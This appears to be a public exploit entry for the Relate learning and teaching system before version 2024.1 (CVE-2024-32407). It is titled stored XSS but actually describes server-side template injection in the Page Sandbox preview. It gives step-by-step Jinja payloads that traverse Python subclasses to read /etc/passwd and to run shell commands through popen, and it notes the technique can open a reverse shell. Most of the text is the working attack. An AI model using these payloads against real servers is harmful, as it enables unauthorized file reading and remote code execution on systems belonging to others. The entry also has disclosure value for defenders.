# Exploit Title: Relate Learning And Teaching system Version before 2024.1 Stored XSS # Date: 18/04/2024 # Exploit Author: kai6u # Vendor Homepage: https://github.com/inducer/ # Software Link: https://github.com/inducer/relate # Version: 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6) # Tested on: Ubuntu 22.04 # CVE : CVE-2024-32407(Reserved) * SSTI is in the Page Sandbox feature, which allows user to check flow pages before publish. 1) The attacker uses the Page Sandbox feature to plant the following payload. * Payload: * {{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }} * Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment. 2) Click an Preview including the above payload. * Then you will see that the contents of the `/etc/passwd` file are output at the Content Preview block. 3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen. * Payload: * {{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }} 4) Click an Preview including the above payload. * If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command. * An attacker can use this feature to execute reverse shell.
References:
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection